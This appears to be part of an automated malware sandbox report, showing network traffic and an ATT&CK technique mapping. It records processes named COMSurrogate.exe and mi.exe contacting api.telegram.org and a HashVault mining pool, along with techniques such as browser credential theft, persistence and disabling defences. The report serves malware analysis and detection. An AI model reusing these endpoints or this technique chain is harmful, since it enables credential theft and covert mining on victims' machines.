ciscobinary.openh264.org

dns

firefox.exe

140 B
572 B
2
2

DNS Request

ciscobinary.openh264.org

DNS Request

ciscobinary.openh264.org

DNS Response

88.221.134.209

88.221.134.155

DNS Response

88.221.134.209

88.221.134.155
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

142.250.187.206
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

130 B
162 B
2
2

DNS Request

redirector.gvt1.com

DNS Request

redirector.gvt1.com

DNS Response

142.250.187.206

DNS Response

142.250.187.206
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

134 B
198 B
2
2

DNS Request

a19.dscg10.akamai.net

DNS Request

a19.dscg10.akamai.net

DNS Response

88.221.134.209

88.221.134.155

DNS Response

88.221.134.209

88.221.134.155
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

67 B
123 B
1
1

DNS Request

a19.dscg10.akamai.net

DNS Response

2a02:26f0:a1::58dd:869b

2a02:26f0:a1::58dd:86d1
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
93 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

2a00:1450:4009:81f::200e
142.250.187.206:443

redirector.gvt1.com

https

firefox.exe

1.9kB
9.3kB
8
10
8.8.8.8:53

r4---sn-aigzrnsz.gvt1.com

dns

firefox.exe

71 B
116 B
1
1

DNS Request

r4---sn-aigzrnsz.gvt1.com

DNS Response

74.125.175.169
8.8.8.8:53

r4.sn-aigzrnsz.gvt1.com

dns

firefox.exe

69 B
85 B
1
1

DNS Request

r4.sn-aigzrnsz.gvt1.com

DNS Response

74.125.175.169
8.8.8.8:53

r4.sn-aigzrnsz.gvt1.com

dns

firefox.exe

138 B
194 B
2
2

DNS Request

r4.sn-aigzrnsz.gvt1.com

DNS Response

2a00:1450:4009:1b::9

DNS Request

r4.sn-aigzrnsz.gvt1.com

DNS Response

2a00:1450:4009:1b::9
8.8.8.8:53

216.72.190.35.in-addr.arpa

dns

72 B
124 B
1
1

DNS Request

216.72.190.35.in-addr.arpa
8.8.8.8:53

31.243.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

31.243.111.52.in-addr.arpa
8.8.8.8:53

209.134.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

209.134.221.88.in-addr.arpa
8.8.8.8:53

169.175.125.74.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

169.175.125.74.in-addr.arpa
74.125.175.169:443

r4.sn-aigzrnsz.gvt1.com

https

firefox.exe

1.8kB
5.9kB
6
7
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
1

DNS Request

play.google.com
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.250.179.238
8.8.8.8:53

play.google.com

dns

firefox.exe

122 B
178 B
2
2

DNS Request

play.google.com

DNS Response

2a00:1450:4009:81d::200e

DNS Request

play.google.com

DNS Response

2a00:1450:4009:81d::200e
142.250.179.238:443

play.google.com

https

firefox.exe

2.2kB
9.4kB
9
11
8.8.8.8:53

238.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

238.179.250.142.in-addr.arpa
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.balrog.prod.cloudops.mozgcp.net
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
110 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
187 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

api.telegram.org

dns

COMSurrogate.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

pool.hashvault.pro

dns

mi.exe

64 B
80 B
1
1

DNS Request

pool.hashvault.pro

DNS Response

95.179.241.203
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

203.241.179.95.in-addr.arpa

dns

146 B
244 B
2
2

DNS Request

203.241.179.95.in-addr.arpa

DNS Request

203.241.179.95.in-addr.arpa
142.250.200.14:443

consent.youtube.com

https

firefox.exe

2.6kB
10.5kB
8
14
8.8.8.8:53

185.66.119.188.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

185.66.119.188.in-addr.arpa
8.8.8.8:53

233.38.18.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

233.38.18.104.in-addr.arpa
8.8.8.8:53

23.149.64.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

23.149.64.172.in-addr.arpa
8.8.8.8:53

206.157.214.31.in-addr.arpa

dns

146 B
214 B
2
2

DNS Request

206.157.214.31.in-addr.arpa

DNS Request

206.157.214.31.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion